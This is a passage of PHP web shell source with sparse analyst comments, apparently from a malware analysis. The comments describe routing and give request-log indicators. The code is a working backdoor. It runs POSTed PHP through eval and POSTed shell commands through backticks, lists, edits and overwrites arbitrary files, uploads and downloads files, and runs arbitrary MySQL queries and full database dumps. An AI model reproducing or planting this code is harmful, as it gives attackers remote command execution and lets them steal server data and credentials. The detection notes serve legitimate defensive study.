  3268. $s=str_replace('\\\'','\'',$s);
  3269. $s=str_replace('\\\\','\\',$s);
  3270. $s=str_replace('\\"','"',$s);
  3271. $s=str_replace('\\\0','\0',$s);
  3272. }
  3273. return $s;
  3274. }
  // [analyst note] get_perms($fn): formats the permission bits of a path as a
  // nine-character string (owner, group, other; 'r', 'w', 'x' or '-' for each bit),
  // based on the value returned by fileperms(). File type and the setuid, setgid and
  // sticky bits are not represented. The return value of fileperms() is not checked
  // for failure; the callers in the file-manager listing invoke this with '@'.
  //   @param  string $fn  path to inspect
  //   @return string      e.g. "rw-r--r--"
  3275. function get_perms($fn)
  3276. {
  3277. $mode=fileperms($fn);
  3278. $perms='';
  // Owner bits.
  3279. $perms .= ($mode & 00400) ? 'r' : '-';
  3280. $perms .= ($mode & 00200) ? 'w' : '-';
  3281. $perms .= ($mode & 00100) ? 'x' : '-';
  // Group bits.
  3282. $perms .= ($mode & 00040) ? 'r' : '-';
  3283. $perms .= ($mode & 00020) ? 'w' : '-';
  3284. $perms .= ($mode & 00010) ? 'x' : '-';
  // Other bits.
  3285. $perms .= ($mode & 00004) ? 'r' : '-';
  3286. $perms .= ($mode & 00002) ? 'w' : '-';
  3287. $perms .= ($mode & 00001) ? 'x' : '-';
  3288. return $perms;
  3289. }
  // [analyst note] Request routing for the file-manager section.
  // $head holds the opening HTML emitted by each page. $page is taken from the POST
  // field 'page', or from the whole query string when that field is absent, and anything
  // other than 'cmd', 'mysql' or 'eval' falls back to 'cmd'.
  // Detection: requests whose query string is exactly "cmd", "eval" or "mysql", or POST
  // bodies with page=cmd|eval|mysql, addressed to a PHP file that is not part of the
  // deployed application.
  3290. $head=<<<headka
  3291. <html>
  3292.  
  3293. headka;
  3294. $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
  3295. $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
  // $winda is the strpos() result for "wind" in the lower-cased php_uname() string; the
  // listing code compares it to false to decide whether to call the posix_* functions.
  3296. $winda=strpos(strtolower(php_uname()),'wind');
  // 'format' is the column width used when file names are printed in the listing.
  3297. define('format',50);
  3298.  
  3299. switch($page)
  3300. {
  3301. case 'eval':
  3302. {
  3303. $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
  3304. $eval_value=magic_q($eval_value);
  3305. $action=isset($_POST['action'])?$_POST['action']:'eval';
  3306. if($action=='eval_in_html') @eval($eval_value);
  3307. else
  3308. {
  3309. echo($head);
  3310. ?>
  3311. <hr>
  3312.  
  3313. <hr>
  3314. <?
  3315. }
  3316. break;
  3317. }
  3318. case 'cmd':
  3319. {
  3320. $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
  3321. $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
  3322. $action=isset($_POST['action'])?$_POST['action']:'cmd';
  3323. if(@is_dir($work_dir))
  3324. {
  3325. @chdir($work_dir);
  3326. $work_dir=getcwd();
  3327. if($work_dir=='')$work_dir='/';
  3328. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3329. }
  3330. else if(file_exists($work_dir))$work_dir=realpath($work_dir);
  3331. $work_dir=str_replace('\\','/',$work_dir);
  3332. $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
  3333. switch($action)
  3334. {
  3335. case 'cmd' :
  3336. {
  3337. echo($head);
  3338. ?>
  3339.  
  3340. <pre>
  3341. <?
  3342. if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
  3343. else
  3344. {
  3345. $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
  3346. if(@is_dir($work_dir))
  3347. {
  3348. echo('<H1>File Manager;</H1><hr>');
  3349. echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
  3350. $handle=@opendir($work_dir);
  3351. if($handle)
  3352. {
  3353. while(false!==($fn=readdir($handle))){$files[]=$fn;};
  3354. @closedir($handle);
  3355. sort($files);
  3356. $not_dirs=array();
  3357. for($i=0;$i<sizeof($files);$i++)
  3358. {
  3359. $fn=$files[$i];
  3360. if(is_dir($fn))
  3361. {
  3362. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)
  3363.  
  3364. >format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
  3365. if($winda===false)
  3366. {
  3367. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3368. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3369. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3370. }
  3371. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3372. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3373. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3374. }
  3375. else {$not_dirs[]=$fn;}
  3376. }
  3377. for($i=0;$i<sizeof($not_dirs);$i++)
  3378. {
  3379. $fn=$not_dirs[$i];
  3380. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',
  3381.  
  3382. $fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
  3383. if($winda===false)
  3384. {
  3385. $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
  3386. $group=@posix_getgrgid(@filegroup($work_dir.$fn));
  3387. printf("% 20s|% -20s",$owner['name'],$group['name']);
  3388. }
  3389. echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
  3390. printf("% 20s ",@filesize($work_dir.$fn).'B');
  3391. printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
  3392. }
  3393. echo('</pre><hr>');
  3394. ?>
  3395. <form name='list' method=post>
  3396. <input name='work_dir' type=hidden size=120><br>
  3397. <input name='page' value='cmd' type=hidden>
  3398. <input name='f_action' value='view' type=hidden>
  3399. </form>
  3400. <?
  3401. } else echo('Error Listing '.$e_work_dir);
  3402. }
  3403. else
  3404. switch($f_action)
  3405. {
  3406. case 'view':
  3407. {
  3408. echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
  3409. $f=@fopen($work_dir,'r');
  3410. ?>
  3411. <form method=post>
  3412. <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
  3413. <input name='page' value='cmd' type=hidden>
  3414. <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
  3415. <input name='f_action' value='save' type=submit>
  3416. </form>
  3417. <?
  3418. break;
  3419. }
  3420. case 'save' :
  3421. {
  3422. $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
  3423. $f=@fopen($work_dir,'w');
  3424. if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
  3425. else
  3426. {
  3427. fwrite($f,$file_text);
  3428. fclose($f);
  3429. echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
  3430. }
  3431. break;
  3432. }
  3433. }
  3434. break;
  3435. }
  3436. break;
  3437. }
  3438. case 'upload' :
  3439. {
  3440. if($work_dir=='')$work_dir='/';
  3441. else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
  3442. $f=$_FILES["filename"]["name"];
  3443. if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
  3444. else
  3445. {
  3446. echo('file is uploaded in '.$e_work_dir);
  3447. }
  3448. break;
  3449. }
  3450. case 'download' :
  3451. {
  3452. $fname=isset($_POST['fname'])?$_POST['fname']:'';
  3453. $temp_file=isset($_POST['temp_file'])?'on':'nn';
  3454. $f=@fopen($fname,'r');
  3455. if(!($f)) echo('file is not exists');
  3456. else
  3457. {
  3458. $archive=isset($_POST['archive'])?$_POST['archive']:'';
  3459. if($archive=='gzip')
  3460. {
  3461. Header("Content-Type:application/x-gzip\n");
  3462. $s=gzencode(fread($f,filesize($fname)));
  3463. Header('Content-Length: '.strlen($s)."\n");
  3464. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
  3465. echo($s);
  3466. }
  3467. else
  3468. {
  3469. Header("Content-Type:application/octet-stream\n");
  3470. Header('Content-Length: '.filesize($fname)."\n");
  3471. Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
  3472. ob_start();
  3473. while(feof($f)===false)
  3474. {
  3475. echo(fread($f,10000));
  3476. ob_flush();
  3477. }
  3478. }
  3479. }
  3480. }
  3481. }
  3482. break;
  3483. }
  3484. case 'mysql' :
  3485. {
  3486. $action=isset($_POST['action'])?$_POST['action']:'query';
  3487. $user=isset($_POST['user'])?$_POST['user']:'';
  3488. $passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
  3489. $db=isset($_POST['db'])?$_POST['db']:'';
  3490. $host=isset($_POST['host'])?$_POST['host']:'localhost';
  3491. $query=isset($_POST['query'])?magic_q($_POST['query']):'';
  3492. switch($action)
  3493. {
  3494. case 'dump' :
  3495. {
  3496. $mysql_link=@mysql_connect($host,$user,$passwd);
  3497. if(!($mysql_link)) echo('Connect error');
  3498. else
  3499. {
  3500. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  3501. $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
  3502. $archive=isset($_POST['archive'])?$_POST['archive']:'none';
  3503. if($archive!=='none')$to_file=false;
  3504. $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
  3505. $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
  3506. if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
  3507. else
  3508. {
  3509. $dump_file="# MySQL Dumper\n#db $db from $host\n";
  3510. ob_start();
  3511. if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
  3512. if($table_dump=='')
  3513. {
  3514. if(!$to_file)
  3515. {
  3516. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3517. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3518. }
  3519. $result=mysql_query('show tables',$mysql_link);
  3520. for($i=0;$i<mysql_num_rows($result);$i++)
  3521. {
  3522. $rows=mysql_fetch_array($result);
  3523. $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
  3524. if(!$result2)$dump_file.='#error table '.$rows[0];
  3525. else
  3526. {
  3527. $dump_file.='create table `'.$rows[0]."`(\n";
  3528. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3529. {
  3530. $rows2=mysql_fetch_array($result2);
  3531. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3532. }
  3533. $rows2=mysql_fetch_array($result2);
  3534. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3535. $type[$j]=$rows2[1];
  3536. $dump_file.=");\n";
  3537. mysql_free_result($result2);
  3538. $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
  3539. $columns=$j-1;
  3540. for($j=0;$j<mysql_num_rows($result2);$j++)
  3541. {
  3542. $rows2=mysql_fetch_array($result2);
  3543. $dump_file.='insert into `'.$rows[0].'` values (';
  3544. for($k=0;$k<$columns;$k++)
  3545. {
  3546. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3547. }
  3548. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3549. if($archive=='none')
  3550. {
  3551. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3552. else
  3553. {
  3554. echo($dump_file);
  3555. ob_flush();
  3556. }
  3557. $dump_file='';
  3558. }
  3559. }
  3560. mysql_free_result($result2);
  3561. }
  3562. }
  3563. mysql_free_result($result);
  3564. if($archive!='none')
  3565. {
  3566. $dump_file=gzencode($dump_file);
  3567. header('Content-Length: '.strlen($dump_file)."\n");
  3568. echo($dump_file);
  3569. }
  3570. else if($t_f)
  3571. {
  3572. fclose($t_f);
  3573. echo('Dump for '.$db_dump.' now in '.$to_file);
  3574. }
  3575. }
  3576. else
  3577. {
  3578. $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
  3579. if(!$result2)echo('error table '.$table_dump);
  3580. else
  3581. {
  3582. if(!$to_file)
  3583. {
  3584. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3585. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3586. }
  3587. if($to_file===false)
  3588. {
  3589. header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  3590. header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  3591. }
  3592. $dump_file.="create table `{$table_dump}`(\n";
  3593. for($j=0;$j<mysql_num_rows($result2)-1;$j++)
  3594. {
  3595. $rows2=mysql_fetch_array($result2);
  3596. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  3597. }
  3598. $rows2=mysql_fetch_array($result2);
  3599. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  3600. $type[$j]=$rows2[1];
  3601. $dump_file.=");\n";
  3602. mysql_free_result($result2);
  3603. $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
  3604. $columns=$j-1;
  3605. for($j=0;$j<mysql_num_rows($result2);$j++)
  3606. {
  3607. $rows2=mysql_fetch_array($result2);
  3608. $dump_file.='insert into `'.$table_dump.'` values (';
  3609. for($k=0;$k<$columns;$k++)
  3610. {
  3611. $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
  3612. }
  3613. $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
  3614. if($archive=='none')
  3615. {
  3616. if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
  3617. else
  3618. {
  3619. echo($dump_file);
  3620. ob_flush();
  3621. }
  3622. $dump_file='';
  3623. }
  3624. }
  3625. mysql_free_result($result2);
  3626. if($archive!='none')
  3627. {
  3628. $dump_file=gzencode($dump_file);
  3629. header('Content-Length: '.strlen($dump_file)."\n");
  3630. echo $dump_file;
  3631. }else if($t_f)
  3632. {
  3633. fclose($t_f);
  3634. echo('Dump for '.$db_dump.' now in '.$to_file);
  3635. }
  3636. }
  3637. }
  3638. }
  3639. }
  3640. break;
  3641. }
  // 'query' action of the shell's MySQL page: prints $head, renders the
  // connection / query / dump form, then connects with the given credentials,
  // runs $query and prints the result set as an HTML table.
  // NOTE(review): $host, $user, $passwd, $db and $query are set outside this
  // chunk; presumably they come from the POSTed form fields. Confirm against
  // the earlier code.
  // Defender view: a single POST form carries page=mysql, action=query|dump and
  // the field names user, passwd, host, db, query, db_dump, table_dump, archive
  // and to_file. That combination is a usable request-log / WAF indicator for
  // this panel.
  // The form echoes $user, $passwd, $host and $db into single-quoted attribute
  // values without escaping; only $query goes through htmlspecialchars().
  // The right-hand table submits action=dump; the dump case above opens $to_file
  // with fopen(..., 'w'), presumably fed by the to_file field here (verify).
  3642. case 'query' :
  3643. {
  3644. echo($head);
  3645. ?>
  3646. <hr>
  3647. <form method=post>
  3648. <table>
  3649. <td>
  3650. <table align=left>
  3651. <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host'
  3652.  
  3653. type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
  3654. <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
  3655. </table>
  3656. </td>
  3657. <td>
  3658. <table>
  3659. <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
  3660. <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
  3661. <input name='archive' type=radio value='none'>without arch
  3662. <input name='archive' type=radio value='gzip' checked=true>gzip archive
  3663. <tr><td><input type=submit name='action' value='dump'></td></tr>
  3664. <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
  3665. </table>
  3666. </td>
  3667. </table>
  3668. <input name='page' value='mysql' type=hidden>
  3669. <input name='action' value='query' type=submit>
  3670. </form>
  3671. <hr>
  3672. <?
  // Short open tag: this part only executes as PHP when short_open_tag is on.
  // ext/mysql (the mysql_* functions) was removed in PHP 7.0, so this path needs
  // PHP 5.x or a compatibility shim. '@' suppresses the warning a failed
  // connect would otherwise emit.
  3673. $mysql_link=@mysql_connect($host,$user,$passwd);
  3674. if(!($mysql_link)) echo('Connect error');
  3675. else
  3676. {
  // Select a database only when one was supplied; on failure report it, close
  // the link and leave this case.
  3677. if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
  3678. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  // $query is sent to the server verbatim, so the page can do whatever the
  // supplied account is privileged to do.
  3679. $result=@mysql_query($query,$mysql_link);
  // Server error text is echoed without HTML escaping.
  3680. if(!($result))echo(mysql_error());
  3681. else
  3682. {
  // Header row: one cell per result column, column names HTML-escaped.
  3683. echo("<table valign=top align=left>\n<tr>");
  3684. for($i=0;$i<mysql_num_fields($result);$i++)
  3685. echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
  3686. echo("\n</tr>\n");
  // One table row per result row; every cell value is HTML-escaped.
  3687. for($i=0;$i<mysql_num_rows($result);$i++)
  3688. {
  3689. $rows=mysql_fetch_array($result);
  3690. echo('<tr valign=top align=left>');
  3691. for($j=0;$j<mysql_num_fields($result);$j++)
  3692. {
  3693. echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
  3694. }
  3695. echo("</tr>\n");
  3696. }
  3697. echo("</table>\n");
  3698. }
  3699. mysql_close($mysql_link);
  3700. }
  3701. break;
  3702. }
  3703. }
  3704. break;
  3705. }
  3706. }
  3707. ?>